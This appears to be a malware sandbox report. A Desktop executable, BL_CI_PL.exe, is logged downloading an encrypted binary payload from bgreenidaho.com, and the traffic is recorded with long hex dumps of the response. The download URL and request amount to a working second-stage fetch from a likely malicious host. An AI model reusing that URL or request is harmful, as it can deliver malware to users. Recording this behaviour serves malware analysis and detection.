                                                                                                                                                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>


                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.11.204980720.124.109.2443C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2021-11-29 13:05:26 UTC0OUTGET /Newfile/bin_UFDek247.bin HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Host: bgreenidaho.com
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    2021-11-29 13:05:26 UTC0INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:05:26 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Last-Modified: Mon, 29 Nov 2021 09:03:01 GMT
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 167488
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    2021-11-29 13:05:26 UTC0INData Raw: 92 59 6a 3b 87 e0 3e ba ac 61 1e 9d f6 c9 df ba 62 bf e5 c7 7a c4 9c 08 b1 4e d4 60 c3 3f d4 88 b8 72 47 b8 2f 6d 29 8e 33 82 67 e5 01 50 d3 29 cc 40 5b 5d d3 b4 13 93 10 4a 50 4d e4 45 c5 38 95 37 99 7a 58 85 3e c8 30 3e 65 a5 f1 fe 32 8e d3 0c 06 d8 57 89 63 8e 2d b5 ba 39 47 6b 5f 57 9b 95 58 e8 89 7f c2 84 8b 82 7f 21 b0 74 fb 78 9c c8 8f d1 65 3f d7 2e cb cc 0b 54 47 5e 2f c7 a1 2c 6b f6 3f 5b 51 cf 76 c1 f9 8b 60 85 31 3f f8 03 5d 7b bb 1c a8 30 fc f2 c4 c6 f9 be be 63 ee 83 51 53 d6 e2 15 c0 de 05 51 54 88 de b8 29 a5 de 6e be aa d1 f5 66 37 e8 52 f1 1b 6f 68 66 6f e6 bd 78 7f d6 c0 a9 24 5b b0 50 cd 2d e9 55 b7 e6 0d 63 45 ab 40 4c f6 ff 26 1e fa 8d 35 6d c9 f8 cb 43 fc 85 ce aa 17 53 9f 60 07 33 3b 17 8c ab 3b 8a 39 94 cc f5 24 ed 10 4c b0 a4 6c
                                                                                                                                                    Data Ascii: Yj;>abzN`?rG/m)3gP)@[]JPME87zX>0>e2Wc-9Gk_WX!txe?.TG^/,k?[Qv`1?]{0cQSQT)nf7Rohfox$[P-UcE@L&5mCS`3;;9$Ll
                                                                                                                                                    2021-11-29 13:05:26 UTC8INData Raw: 28 0f 58 ee 0d a9 e5 f4 84 21 ce b3 15 95 9c 98 9d 51 9c 90 7b 9f 34 b8 00 25 94 b8 77 00 7a 36 cf 99 e3 4e fb 73 3d 88 5b ce 72 27 55 be 16 b9 c2 33 fe 38 59 04 4d 59 95 89 9f 6d d9 81 3d 7b 28 e3 1e e3 77 f1 af 86 63 37 d0 e4 50 55 10 ab 93 32 f4 ab 06 09 78 69 68 b6 8d 06 c0 10 88 bb ee 10 3f 42 cd 5a 9a a8 00 f6 fb 1c 0e f6 ab bc 62 60 bc 64 59 49 17 89 f2 5d cc c9 d1 8d 7d 94 39 e9 53 8a 33 6e 52 97 56 96 cd 5e f4 22 07 93 2b 09 b3 28 dc ea 1c 98 ed 7f 91 9b be 3a 56 64 65 a2 1e e7 47 b2 20 36 52 f9 8b d5 cf 53 22 15 c5 47 2e d3 40 74 9b da 50 0b 6e d9 03 07 1b 1c ba c5 8c d1 e7 9d ad da 04 55 c4 75 b0 1a 42 f2 b3 2d 9c b2 03 5a ca 3f 4b 1a 60 32 50 95 f6 64 d3 06 c5 8f 8a ce 5e 8f 6d aa 17 56 37 03 a1 c6 bd 3f e7 1f ae 19 40 7f a4 fd de 2a 95 3a cb
                                                                                                                                                    Data Ascii: (X!Q{4%wz6Ns=[r'U38YMYm={(wc7PU2xih?BZb`dYI]}9S3nRV^"+(:VdeG 6RS"G.@tPnUuB-Z?K`2Pd^mV7?@*:
                                                                                                                                                    2021-11-29 13:05:26 UTC15INData Raw: 87 15 4d f1 2e 9a c0 5e 6b 49 aa 82 11 79 99 6a 4f 9d 1d e4 f8 b6 aa d4 8b 12 e9 71 82 39 63 20 8b c9 3c 33 4c af b4 8a a2 a7 9f 6d e0 7a 59 95 ea fc 2a 76 dc 77 57 60 8e fe 6c d7 ab b8 91 eb 8a 0c 89 8f 1b f1 da a7 32 98 0d 0f 32 96 fa 18 9f ed 7f d1 31 ae e4 f4 e0 1d 5f 21 48 79 af c8 e4 6a 83 a7 c3 76 e1 11 04 59 28 35 07 49 cf 88 a8 74 c6 83 0b c4 6a 6b 86 44 3a ac 85 6b e8 38 0c 64 b2 59 8b 39 c7 24 16 10 a9 10 c1 78 9d c9 2f df 29 f7 dd e0 e2 4c 93 ee d8 b2 c8 5d c6 84 6d c2 04 dd 6f 4d 3e 66 29 25 4c 55 68 6d cd 2f 81 06 79 42 5f 3f cd 68 22 02 53 a7 02 a1 a0 17 c3 22 b8 fd 39 a3 38 46 86 86 ec 99 17 52 90 2a bb 1d 9b 03 a7 df b6 00 74 62 1b e5 db 11 b8 85 ef 2e 00 fa 82 3a dd 04 cd b8 87 2a d6 37 84 1a 19 f7 ad 8d a9 bc 17 37 d3 06 02 64 8a 71 ed
                                                                                                                                                    Data Ascii: M.^kIyjOq9c <3LmzY*vwW`l221_!HyjvY(5ItjkD:k8dY9$x/)L]moM>f)%LUhm/yB_?h"S"98FR*tb.:*77dq
                                                                                                                                                    2021-11-29 13:05:26 UTC23INData Raw: 73 80 90 04 06 a6 90 12 64 e6 ad ec db 43 46 9c 9e 64 f3 5c e1 18 74 95 54 97 95 7c f7 78 bd 33 fd 8e d4 65 e6 d2 19 8a 64 25 68 1d 2f 0b cb 06 50 e2 45 3a 7f 77 6e 34 65 db 49 ab 3b 8a 6f 1f b9 fd 1e a8 7a 59 af f3 85 09 03 29 a7 34 04 7b 8c 5b 10 df d3 25 21 12 ea 71 1b d3 55 43 29 3f ed 04 0d 96 4e 69 ba fa cc 6a 63 90 0d 28 95 3a 68 22 4a bc 63 25 33 71 dd 20 43 43 52 2e f6 9d 4f 03 c5 5d 84 ca b7 13 a6 1f 94 9b 77 bf b5 b6 8d a6 91 01 47 e7 73 14 15 c2 3f 52 ac 6a 77 e9 b0 a8 3a 43 b9 97 fb 9a 49 fe e2 84 92 4a 03 e3 ba f8 45 69 0c 8c 62 5d 5d c1 a3 08 a1 27 0c d4 3d 6a 7d 2b b2 61 73 c6 3b 78 26 0a 62 e1 ca d9 cf bd 9c a8 11 a3 c8 23 c0 52 c6 28 7c 8a 32 b8 5a d2 aa 1d 41 2d 67 c8 bf d3 20 3c 90 fe 9e 0b 03 6f 9c fd 32 6c 86 00 0c 61 9c 38 c5 01 8c
                                                                                                                                                    Data Ascii: sdCFd\tT|x3ed%h/PE:wn4eI;ozY)4{[%!qUC)?Nijc(:h"Jc%3q CCR.O]wGs?Rjw:CIJEib]]'=j}+as;x&b#R(|2ZA-g <o2la8
                                                                                                                                                    2021-11-29 13:05:26 UTC31INData Raw: 28 61 57 20 d6 2c 66 92 3d 80 15 11 96 5e a2 a5 f0 7c 71 92 d6 f1 50 ac ff 69 c7 57 c0 18 e0 d4 55 db 6b 63 c1 40 d4 6a c5 c0 a8 46 b4 36 5c d0 d9 74 9a 21 79 fb 58 f0 55 bb 79 fa c0 2b 22 ec d4 a2 7f 15 1e b7 b1 31 f3 8c f9 1a b3 70 10 cd ae fe c2 26 51 3d c7 82 35 b0 a8 b9 6f 97 36 3a ee 97 d9 1a 82 0e a8 d9 37 5e 2e f9 97 5c 51 7d 73 2e ca a3 60 e2 03 f0 86 f1 c0 2e 2a b6 9a 9b 45 7e 80 47 68 ab b2 47 16 d4 05 f5 cd e0 64 00 c2 8c 03 91 7e 1d c1 da 50 18 67 6f 3d f9 2e 3f 34 42 46 6c cc 4a 8b 46 f2 a1 6a 9d 42 ab cb 2e a8 dc f2 6b 6d 8c b0 64 bd a8 eb 2d d5 41 56 7a f2 b5 e3 09 62 f1 8a b1 58 9d d0 08 4e 9d b3 ff ad 3f f3 81 aa d2 17 4f 0f 88 95 de f0 80 de 96 92 d8 fe 78 0b d7 8c 94 6c 9a 9c db c7 73 ad 77 11 c9 c0 f4 5e 18 74 cc 4a e8 41 e9 c1 2b 1b
                                                                                                                                                    Data Ascii: (aW ,f=^|qPiWUkc@jF6\t!yXUy+"1p&Q=5o6:7^.\Q}s.`.*E~GhGd~Pgo=.?4BFlJFjB.kmd-AVzbXN?Oxlsw^tJA+
                                                                                                                                                    2021-11-29 13:05:26 UTC39INData Raw: 38 e2 b4 07 99 20 1e e3 05 1f 6c a8 42 01 3d c7 c2 59 b0 c4 b9 e1 2a 28 1b 9b 03 11 62 7d d3 9c d7 88 72 a7 00 eb e6 05 bc 88 a2 4c af 60 39 d4 6b f0 1a 93 a1 3a 3f a9 c3 4e 80 b2 74 74 d8 b7 35 ac dc 5a 1d 56 09 66 0e 76 aa 27 c2 9b 95 6f d7 3b a3 0d 1a 3a 41 ac 17 af 0f b5 79 4f 01 77 9b 2e 17 3c 23 cc 62 3a d1 d4 9b 32 60 28 2a 36 e6 91 73 9e 02 d3 92 b2 e9 07 c7 fe 70 7e 53 33 12 9c 6e 2f 7c 83 5d 36 66 79 08 c9 7a 07 52 5f 4a 0e 88 4c 70 9b f3 37 a5 18 5c fa 01 30 38 df d9 87 a7 64 7b 66 79 ce 5e 65 0b 80 90 45 6a ac d2 12 9d fb 1a 10 ad 77 a0 7b 45 5b 48 83 de b5 77 2b ce 70 c2 8e 05 df 33 07 d6 e8 01 07 f6 65 ca f2 fb 6e be e5 67 2f bf 66 45 b1 43 f9 e2 f3 34 26 ce 54 41 29 3f 6a 95 10 50 e6 51 a9 0b 83 05 d4 ae ba 15 3e fe 31 49 ce db a6 e2 93 39
                                                                                                                                                    Data Ascii: 8 lB=Y*(b}rL`9k:?Ntt5ZVfv'o;:AyOw.<#b:2`(*6sp~S3n/|]6fyzR_JLp7\08d{fy^eEjw{E[Hw+p3eng/fEC4&TA)?jPQ>1I9
                                                                                                                                                    2021-11-29 13:05:26 UTC47INData Raw: 8c e7 6c 7b ad 45 ec 84 d3 b8 b9 d7 c4 6e c1 85 15 79 d3 ba b6 1b 24 c1 73 48 63 55 b5 4f ef 65 c7 2e a8 0f 60 8b ad af 40 1f 98 25 eb d1 a7 3b e7 6b 54 a2 b3 84 45 00 56 e5 de 6f d3 08 32 33 b1 25 6e 63 2a 9d aa 45 79 4e 82 1d c7 ca 60 5c 8d 1b 5a 55 aa d4 1c dc 25 e6 1e ad a6 10 bd e2 4a 3f ba c8 c0 77 17 85 f9 a5 01 e9 ef fe 8e a9 67 25 b8 f0 0f 48 e0 db 7d 1f 2f 42 e5 c2 22 77 65 99 07 d6 df f7 06 f6 6d 4b f2 27 12 b3 60 a7 5b d3 85 a0 fc 80 93 bf f3 fc d6 63 43 b9 6a 68 82 d4 bf a7 94 89 d4 59 f2 bf d3 af 38 cb 88 16 45 11 92 db 95 2b 76 74 a7 22 ff 15 43 1c 88 2b 7c 8a 8f 28 0c 89 6f ca 4a fe 6e f1 b0 36 13 47 6a f8 f6 0b 40 73 aa 99 20 6a b7 f4 aa 07 dc c1 0d d8 f6 e4 0f c7 25 a8 cb 3e 99 f4 cb a2 99 29 c6 fb e2 5b a3 b1 1b 1b b8 5b 2e 62 d0 3e 1b
                                                                                                                                                    Data Ascii: l{Eny$sHcUOe.`@%;kTEVo23%nc*EyN`\ZU%J?wg%H}/B"wemK'`[cCjhY8E+vt"C+|(oJn6Gj@s j%>)[[.b>
                                                                                                                                                    2021-11-29 13:05:26 UTC55INData Raw: 3e 9f 4e 0f 88 af 1d ce 93 fb fc 1f 37 fa d2 a7 c0 06 7a e1 2e e1 e0 2c ab 03 ff bd 08 b4 05 11 4d f5 dc 3e 62 bb 9f d5 45 8c 22 7c 76 5b e3 66 83 76 75 27 42 35 6e 8e 05 d4 83 06 f9 ce 20 06 f6 ee 67 fa be aa b2 ed 38 07 cd 0e 45 f2 ab 05 7a 7e 79 d5 5f ec cb ad ce 62 1e 5d 0b 39 ec a5 9c 0e 40 7a 73 95 f9 3f 41 ad da c2 db 95 7d 47 15 f9 a2 ff e9 37 6c 01 a4 7c 76 21 80 b4 dc 6f 2d 4a 7d 27 45 ae 69 57 b9 95 a9 a0 bd 8c 61 08 a5 f8 f1 a4 b1 34 83 bc b9 31 25 18 95 27 f6 2d e0 4d be 1f 3f 9e f4 71 03 17 c4 75 cd bd b3 19 4b b8 5b 6c 63 d0 3e 1b b9 b1 05 d3 0e 7b 15 c3 2d ae fb 7c 97 b3 64 30 2e 27 5c e2 1d 62 64 99 15 eb d4 43 1a 4b 42 3e 3e 5f a4 59 a3 4c af 12 ff 35 26 c1 31 45 74 24 bb e0 80 a8 1a f6 ae 3b a8 69 b0 76 c4 0f 17 3f 92 2d de 3c 72 2b d5
                                                                                                                                                    Data Ascii: >N7z.,M>bE"|v[fvu'B5n g8Ez~y_b]9@zs?A}G7l|v!o-J}'EiWa41%'-M?quK[lc>{-|d0.'\bdCKB>>_YL5&1Et$;iv?-<r+
                                                                                                                                                    2021-11-29 13:05:26 UTC62INData Raw: 60 a7 5b 06 5b 49 cb 43 ab 3f fb 81 2b 60 43 16 d2 54 c1 1e 5d d5 e6 fc a4 a6 f1 11 c4 10 79 15 6f 95 81 bb a8 58 29 6e e6 00 cc 98 a3 9d a0 6e 90 56 81 89 8f 85 b4 b5 03 2d 4a 47 bf 7d f5 36 6c 7c 91 cf 29 6f 42 7c a8 99 5c 25 c2 69 e1 4d 49 b6 a2 aa 84 42 79 dd 87 3a 49 8f 5a ff 9c 79 e5 10 dc f9 e2 cc 3f 77 1d 49 dd 16 da 61 d0 4a 3f d7 52 80 f9 e6 09 6f d3 cb 97 04 2c f2 9b 22 46 7e aa 52 6c fe 18 5b bc 8b e3 19 44 18 4b 93 6f 0d b7 0b 25 18 4c d3 29 8f 6b c8 24 0a 0f 72 94 46 6a 40 cb 80 27 f8 d3 f9 09 da 58 c5 d4 c9 d8 d0 bc 73 8b fc 2b 93 71 f3 f3 4e e5 0e 0f a9 ba fe 30 7e 09 b5 53 27 a4 73 28 cc b0 a9 c4 de e3 9b 96 c1 86 af de 7d 13 89 91 5f 88 da a5 f7 bc ed bb 2a b3 99 08 f3 26 61 7a 47 77 57 6f 41 a0 b2 4a a8 7a b2 71 00 07 44 36 a8 71 a2 27
                                                                                                                                                    Data Ascii: `[[IC?+`CT]yoX)nnV-JG}6l|)oB|\%iMIBy:IZy?wIaJ?Ro,"F~Rl[DKo%L)k$rFj@'Xs+qN0~S's(}_*&azGwWoAJzqD6q'
                                                                                                                                                    2021-11-29 13:05:26 UTC70INData Raw: ee 55 0c a3 fd c1 f8 2d 0c b1 85 d7 27 09 d2 b6 6c 58 23 cb 3f 99 ff cf a2 f8 12 2c ec 53 16 bc b3 9a df 65 be b2 8f d4 70 20 df 52 80 c0 a5 0d ad 27 de 50 de 7c a4 1b 40 e4 82 37 bb a8 88 9d c8 9e 5b 29 84 54 c0 91 6c 3e 31 60 ea 9b f3 3e 15 2c ed 35 13 07 12 0c f1 84 45 97 7f 40 78 7e 6e 51 9d f1 32 8e 06 82 42 20 95 2a c9 ea ba c7 12 0d c8 68 13 a6 be 6f a7 34 fd e2 f6 84 30 ab 51 1e 84 12 69 bf b5 1f 05 68 ce ce 26 0b 3d 23 d1 ba 30 1b 93 77 21 30 37 b2 a4 ee 8b c7 83 3f 30 81 50 eb df 54 ea 87 eb d4 a1 cb ac 8c 36 71 00 d9 87 21 3f c2 5f 4d 6b e2 4a f7 1c 69 8c f1 8b cd fd cf 85 83 12 c9 0a 38 82 5f 9a b3 c6 a0 36 03 52 12 83 7a ce 57 3a 81 95 4a 23 8a a5 c6 d6 09 18 ce 7f 30 3d 0c 7c 0e cd 0e 30 bc bd 6a fe af ae 52 e0 f9 7a 8f 7f c6 53 db db 4f 8a
                                                                                                                                                    Data Ascii: U-'lX#?,Sep R'P|@7[)Tl>1`>,5E@x~nQ2B *ho40Qih&=#0w!07?0PT6q!?_MkJi8_6RzW:J#0=|0jRzSO
                                                                                                                                                    2021-11-29 13:05:26 UTC78INData Raw: b3 6c 3e 58 96 32 57 e8 e3 03 bf d5 67 12 97 bf c7 bf 6c 44 94 68 12 a3 b8 76 d3 4b ee da 58 16 46 72 28 1b 92 07 37 d4 c7 94 f2 37 68 86 cd 25 75 af eb b3 3d a7 61 6d 68 59 a2 80 0d 65 64 10 23 1a a2 c1 1a 35 f4 a8 dc d0 65 8d 3b 3a 22 d9 08 58 b4 2e 2e b5 e4 30 55 30 81 8a c6 c7 f8 6f ad 14 7b 08 23 42 6c b1 71 8b 5b 43 37 28 40 ee 27 69 3b e7 9f 0c ad bc 23 50 d6 89 d5 27 10 c7 d8 94 b6 f9 91 10 6b 45 e7 f7 88 86 99 2f fa ce 57 b9 10 e4 b6 68 44 41 22 bb 09 4b ca 1a f3 e1 5c f7 e0 99 c5 e2 ad 86 e1 9b ff ae 56 3b ec 37 31 85 b7 ab 33 d5 ba 08 aa d8 a2 50 e8 d9 89 4f 6b 7b 66 06 6a d1 88 48 7e 1f 20 8c 40 29 66 2a ae 23 e8 f0 7f 12 9f 89 23 67 71 e5 ed a2 e7 0d 38 6d 2f c7 8f fa 7f a3 7f 30 68 c1 a8 b1 34 3a 99 2c 41 a7 4f 37 84 1c 50 0e 54 f6 a4 c6 32
                                                                                                                                                    Data Ascii: l>X2WglDhvKXFr(77h%u=amhYed#5e;:"X..0U0o{#Blq[C7(@'i;#P'kE/WhDA"K\V;713POk{fjH~ @)f*##gq8m/0h4:,AO7PT2
                                                                                                                                                    2021-11-29 13:05:26 UTC86INData Raw: dc cf d1 bb 9b 53 27 e7 6a d2 9d a9 77 5e 8f 69 27 e9 cf 85 45 a6 df b5 f9 cb 1c 29 70 7c b6 29 e0 12 d6 a6 7e a5 00 89 26 be 7b f2 da 1a 49 7e e0 53 bb 5b 64 1a c7 c5 ec 68 7a cf c8 0b 9d 99 3c 50 70 23 2e d1 3a fc 4b a4 70 ad ce 1c ee 1a 5a cc ae ce 93 c2 a0 c9 d8 d3 d8 01 81 3f 92 21 82 42 f7 00 6f f1 ee 00 22 a3 06 a4 b3 cc 43 3a 9e 2f 63 d3 52 05 ff d2 e6 c4 94 97 9a a1 3d 56 d6 61 af 08 55 49 5e 42 fb c1 54 68 5e 6c ce 27 91 64 4c 83 bb 88 d6 6e 93 bc 17 ef 38 5a 31 c4 cf a9 8b c3 e8 66 8a 6f 11 43 10 6a 18 5e 45 19 fd 17 35 7e f3 54 bf ea e2 21 19 12 2d bd 29 44 5a 2e 9f 04 86 bc 4f 49 3f 9a 8c 6d ae 85 a0 54 7e 92 9d ff 2b 42 f4 45 72 42 11 04 1f 3e 57 a8 a7 e2 04 35 fc 20 78 19 ef 52 da d4 d9 22 e2 e5 ff 17 fb 70 ec d9 e2 a5 68 5c 53 c7 45 4e b3
                                                                                                                                                    Data Ascii: S'jw^i'E)p|)~&{I~S[dhz<Pp#.:KpZ?!Bo"C:/cR=VaUI^BTh^l'dLn8Z1foCj^E5~T!-)DZ.OI?mT~+BErB>W5 xR"ph\SEN
                                                                                                                                                    2021-11-29 13:05:26 UTC94INData Raw: 70 bb 5b 50 eb b8 4a 55 27 2d 00 43 f6 21 9b c0 3f 5f 08 94 b1 bf 3d 1d c7 d3 3d 1d e9 f5 ec a5 78 99 98 66 e7 04 52 f5 fb e0 6b 95 4a fd d4 37 f3 88 2d 6b 0d 74 9c 71 29 9a 78 48 a9 ca 0f 4a 28 b1 92 5f 7b ec 5d a4 52 1f c3 cd b7 1a 9b 64 db c0 17 9f 2a 1e 42 60 93 3b b9 cf c6 fb 2e e9 ee 2e ef 96 97 37 58 ee a3 12 07 0c 05 8c 1a 31 2c 95 c9 94 f4 ca d2 53 17 89 ba 81 27 92 b6 38 e7 0c 78 f8 d8 00 20 b2 07 1f eb 5a 9a 76 b9 30 0f 8e 1f b1 6f a4 e5 4f e0 c3 b7 07 5d 6a a7 82 9a 28 4b c2 b7 6a 3a e7 4f 8b 78 bc dc a2 99 86 ec 79 97 c6 fc 0a f4 ab 95 44 78 4e e9 7f 39 d4 f9 10 a7 68 4c f0 be 9b fa 4c 44 91 6e 8f 17 17 9e fa 89 22 75 89 22 5a 67 ba f6 5b 13 e5 57 de fd 56 9f 51 94 4b 68 fd 8a fd 03 09 0e 4e f5 b1 ac 8b 71 2a 63 00 a7 34 e4 90 02 4f 45 09 c4
                                                                                                                                                    Data Ascii: p[PJU'-C!?_==xfRkJ7-ktq)xHJ(_{]Rd*B`;..7X1,S'8x Zv0oO]j(Kj:OxyDxN9hLLDn"u"Zg[WVQKhNq*c4OE
                                                                                                                                                    2021-11-29 13:05:26 UTC101INData Raw: 2d 14 5c a0 88 2c 26 05 bf d4 1b 5c f7 6f 4d 51 f7 97 f8 1b 91 21 91 23 be ec 28 fb f7 55 0d 2c 54 35 97 b5 d8 80 cb 67 2d 96 76 27 5c 29 9b 0e 9e d7 30 af e6 c0 6d dc 28 39 c0 c2 43 75 9a 6d 0d d8 fe 1f 50 d0 fb c7 4a 8b 76 db 69 35 e8 e7 4d 4a aa 3b f6 83 95 58 e8 00 3a 3e 0f ce 8a f4 29 3b 21 07 f1 16 08 8f d1 65 b4 32 73 08 00 5e df 13 0f 4b 66 b7 33 d1 f8 b6 aa a4 89 12 85 73 47 6d a4 65 57 1a 95 20 c8 2c 39 52 8c 2c 49 b1 2e 74 81 b4 ad 82 a3 33 36 7d d0 50 27 bb 90 b4 31 30 1a ab 01 43 54 57 18 ee 8e 67 b4 2d 6f 07 7a f7 ec 84 6e 44 d7 e6 c2 5e d1 91 e1 96 1c d1 91 b1 d6 33 58 69 f7 bf 27 b9 e1 e9 c3 91 99 e9 56 c0 8a ef 60 13 e9 47 07 4d c7 63 69 38 32 77 7d c2 b1 95 2b a3 28 45 92 39 e0 88 78 3d a8 9b 1a cc f2 3f 43 b9 30 a7 b7 43 af 01 1e a5 e8
                                                                                                                                                    Data Ascii: -\,&\oMQ!#(U,T5g-v'\)0m(9CumPJvi5MJ;X:>);!e2s^Kf3sGmeW ,9R,I.t36}P'10CTWg-oznD^3Xi'V`GMci82w}+(E9x=?C0C
                                                                                                                                                    2021-11-29 13:05:26 UTC109INData Raw: 72 5b 90 44 65 8e 70 a6 f5 45 65 e3 64 29 97 e7 86 b3 d6 21 49 61 d6 41 f2 25 cf ff 87 be b8 cb 71 58 18 2b d8 aa 72 cc 0b 54 cc 85 16 98 ab 3c 57 56 3f ef 58 81 90 69 75 63 89 a4 65 57 91 fb 7a 8e 09 06 85 c9 d2 97 6f f2 9c 5b 95 00 cb a0 e5 64 a6 78 37 40 01 93 bc b0 c0 14 2b 7c 8f 3a 5f cf 09 d0 63 e7 6f 62 4a 7c 5f e5 60 ed 52 8c 81 a5 cd a4 99 b6 4d 0a 09 3a 1f d5 47 9e 51 70 26 c4 03 65 4a 62 5d 69 97 09 9e 01 81 78 28 e9 48 f7 4f d7 93 b2 46 f4 ad 5a d6 24 84 a0 73 28 ff 86 bc 54 b9 e6 ff ed 04 0f 7f 62 79 90 87 2d d5 3a 9b 34 57 10 80 c0 9d 29 08 5f 47 65 09 de 49 d8 31 b4 2a d3 31 4c 5c 70 34 9d 09 e1 16 70 15 85 3c 2d 2c 0c bd c6 72 bf af e2 87 fb f0 de 24 c5 0b 02 18 d8 8e cd c8 57 3f 6a fe fe 78 ce fc 52 34 5a 9d fb 1a e4 4c 17 89 83 44 aa 26
                                                                                                                                                    Data Ascii: r[DepEed)!IaA%qX+rT<WV?XiuceWzo[dx7@+|:_cobJ|_`RM:GQp&eJb]ix(HOFZ$s(Tby-:4W)_GeI1*1L\p4p<-,r$W?jxR4ZLD&
                                                                                                                                                    2021-11-29 13:05:26 UTC117INData Raw: 5c 0c a5 98 d0 d0 54 59 cb bb be 7e 18 89 2c 1c 93 c0 b7 24 91 eb 09 c8 e9 c9 b3 0c 54 70 e4 fa 6d b0 0e e4 ac 80 66 12 80 82 3b 85 b9 19 69 95 d4 08 90 16 d5 47 de 7d 7c f7 2b 30 f4 d2 6c 5c ed 61 de 29 01 86 da 14 a1 ef 0b c4 82 9f ba 86 52 74 80 b6 bc 83 d1 6e 54 c4 49 d1 94 cc f5 74 f0 d3 24 74 2d e5 23 36 b8 45 48 3f a8 e1 9b 65 9d 5e fa 8e 23 42 f9 1a dd dc dc cb c0 99 80 cd c1 18 e0 3c c6 04 02 eb f0 ca 5c 83 52 09 19 bd fa 4b 50 2c 26 8b 90 e1 51 7b 33 8a a6 84 6e 05 28 95 94 b4 17 c8 a4 fe 64 88 7d 5d b6 8d f9 1a bc d9 4c c8 63 ca 20 cf a3 18 7d c5 f6 58 a8 b9 87 a9 4a f8 07 bc 20 5c f6 1c 12 54 b2 52 d2 5e ab e5 9e 40 03 a9 02 4b 60 0a 06 0d 21 cd 43 36 8f c5 db 44 a7 7e 80 af 4f c6 70 ae 10 53 13 ea 16 09 64 8d 8f 84 0a 05 c1 36 19 2d 47 99 b9
                                                                                                                                                    Data Ascii: \TY~,$Tpmf;iG}|+0l\a)RtnTIt$t-#6EH?e^#B<\RKP,&Q{3n(d}]Lc }XJ \TR^@K`!C6D~OpSd6-G
                                                                                                                                                    2021-11-29 13:05:26 UTC125INData Raw: e8 ef 0b ca 5f b4 de 88 fe 11 09 a0 0b 67 e1 0a 04 80 80 1f 84 15 a5 18 ce a2 ac 07 db 7c a1 00 61 f9 e2 16 9b 09 02 52 4a 42 34 0d 69 5f 8e 88 ab ca 09 d2 0e e6 46 d2 7b 5c e6 c7 93 b9 ea 1a bb da df 61 9d ba 92 7f 39 73 5c ad 63 97 ef 83 b0 ae 44 ed 85 1e 00 53 78 ff ed 38 5a 52 27 da 53 60 4e ce b1 e1 d4 ec 11 0c ba 69 fa 67 40 71 82 ae 05 89 a6 02 5f c8 32 aa 75 c6 df 12 6b 07 2e 78 ba 0b 39 db 10 f4 89 2d e5 b6 1b ca f7 8e 48 a8 18 96 cf 7f d6 e0 52 4d 38 47 a8 dd 79 be 0e ca 5a ea 80 63 b3 87 0f 7c b8 34 0c c4 f0 f8 9e 95 80 34 14 18 74 10 49 a4 ec a4 7a ed 98 1b d3 65 eb 9b cc d5 56 66 94 f8 29 14 25 92 f8 b6 ff 28 85 6b f8 30 e1 13 d2 9d 2c ec e2 18 c9 e0 8b fd b9 2e f1 7b 3b 0f b2 10 bf 76 41 d2 dc 75 b6 a0 19 9f 4b b2 62 68 7c 5d 2b 70 ec c2 37
                                                                                                                                                    Data Ascii: _g|aRJB4i_F{\a9s\cDSx8ZR'S`Nig@q_2uk.x9-HRM8GyZc|44tIzeVf)%(k0,.{;vAuKbh|]+p7
                                                                                                                                                    2021-11-29 13:05:26 UTC133INData Raw: 03 61 ab b3 e6 13 ca ab 03 8f 95 5c 2e e3 b5 72 2e 99 4e 75 28 2d 6a e3 ac af 03 98 b0 de b0 12 92 04 54 d1 5b ab 26 4d 01 4e 47 1d 79 97 78 a6 1f bd 1f e5 30 d8 d9 2f 0c 9c 12 56 ed cb c6 a7 aa be de e8 6d 3b 39 eb ac d0 ad d5 46 89 fa e9 90 f3 61 c9 ff 06 de d3 14 27 15 60 12 31 c5 90 88 c5 ae 36 7a ef 73 6b 9b 32 ec 42 47 f0 2c 13 82 97 d4 a9 bc 91 4a fa 04 c1 b5 b4 26 f8 20 a7 c0 5f da 90 78 1c d4 6c 1c 2b b3 70 a9 58 78 14 cd 9b 75 d3 4d 1f 40 75 53 42 71 b8 70 72 53 9c d2 04 c2 0b aa 70 b7 42 19 87 70 c3 1c 82 4f fe bb 3e 74 bc 54 b5 c3 24 12 e0 88 92 03 65 7d 08 0d 58 82 98 db eb 22 3f f8 ee a1 bb 4e 34 be 55 da ca c5 61 2b c4 1e 4b 45 11 b9 e5 cd e3 bb 2c 14 17 7c b5 70 b9 18 05 fa 67 d4 b6 81 8e 2a e7 6d 85 ed fa 5c 7c 91 fa d7 81 70 4b 0f a4 42
                                                                                                                                                    Data Ascii: a\.r.Nu(-jT[&MNGyx0/Vm;9Fa'`16zsk2BG,J& _xl+pXxuM@uSBqprSpBpO>tT$e}X"?N4Ua+KE,|pg*m\|pKB
